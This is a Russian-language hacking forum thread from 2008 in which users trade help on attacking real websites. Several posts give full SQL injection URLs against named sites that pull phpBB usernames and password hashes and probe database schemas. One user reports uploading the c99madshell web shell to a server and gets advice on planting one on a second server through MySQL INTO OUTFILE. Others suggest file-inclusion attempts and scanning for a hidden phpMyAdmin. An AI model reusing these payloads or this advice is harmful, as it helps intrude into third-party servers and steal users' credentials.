Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Понял, спасибо.
    Я хочу вытащить с помощью игьекции хеши из форума phpbb2.
    Они вместе в одной базе данных.
    Составляю запрос по типу:
    http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),username,user_password),7,8,9,10,11,12+from+phpbb_users+limit+1,1/*
    Как действовать в этом случае?
     
    1 person likes this.
  2. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    doesn't exist - не существует

    Подбирай таблицу. С суфиксами пробуй.
     
    #2382 .Begemot., 16 Jun 2008
    Last edited: 16 Jun 2008
    1 person likes this.
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Я знаю, что нет.
    Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
    Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
    Собрался составить запрос, чтобы вытащить данные.
    Не дала, :D
     
    #2383 Ershik, 16 Jun 2008
    Last edited: 16 Jun 2008
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name
     
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    PHP:
    union+select+1,2,concat_ws(0x3a,table_name,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/*
    Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas"
    Red sps. ;)
     
    3 people like this.
  6. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
    собственно вот запрос:
    Code:
    http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/*
    
    так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
     
    2 people like this.
  7. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте! :)

    Залил c99madshell на сервер 1.

    Есть доступ admin через c99madshell в MySQL базы сервера 2.

    Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера?



    Спасибо!
     
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Стандартно, через into outfile
     
    _________________________
    1 person likes this.
  9. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ=&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f15bdf6a24b5889fe90dde026
    Бошка не варит у мя совсем(((
    подскажите
     
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    эм... а чем помогать то? это вроде как не скул инж... там в параметре area передается адрес к файлу:
    Code:
    http://darkbrotherhood.ru/index.php?area=1asd&p=static&page=offres
    
    попробуй это заюзать, может получится...
     
    #2390 gisTy, 18 Jun 2008
    Last edited: 18 Jun 2008
    1 person likes this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Foxtrot1
    mysql 4 or 5.
    у юзера нет прав.
    переберай колонки.)
     
    #2391 sabe, 18 Jun 2008
    Last edited: 18 Jun 2008
  12. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    кстати версия мускула не 4, а 5... но доступа к information_schema юзверь не имеет...
    Code:
    http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+information_schema.tables/*
     
  13. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    На выделеном сервере установлен phpmyadmin, как его можно найти, при условии, что папка переименова?
    Существуют какие-нибудь сканеры?
     
  14. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Ну а как ты его найдёшь?
    _https://forum.antichat.ru/threadnav40031-1-10.html Сканер.
    Или поищи скрипт nikto.pl
     
    1 person likes this.
  15. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Попробую. Спасибо.
     
  16. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    кстати по этому запросу говорит не то что нет доступа к базе... а то что базы не существует.. просто запрос неправельный..
    Code:
    http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+mysql.users/*
    вот тут реально говорит что доступа к таблице нет...
     
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    gisTy, во-первых запрос правильный, во-вторых Access denied for user 'darkbrot_mysql'@'%' to database 'mysql' переводица как Доступ запрещен бла-бла-бла, а Doesn't exist - не существует.
     
  18. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    nicto.pl - для cgi. Он не подходит. Скрипты не помогли
    Пытаюсь загрузить через думпер, пишет 500 ошибку.
     
  19. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    сори ступил... эх матан матан... не суждено мне его было сегодня сдеать...
     
  20. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Как подкл к Postgresql ?) и что там можно надыбать?) Точнее я нашол уязв она сообщ что моно приконектиться
     
Thread Status:
Not open for further replies.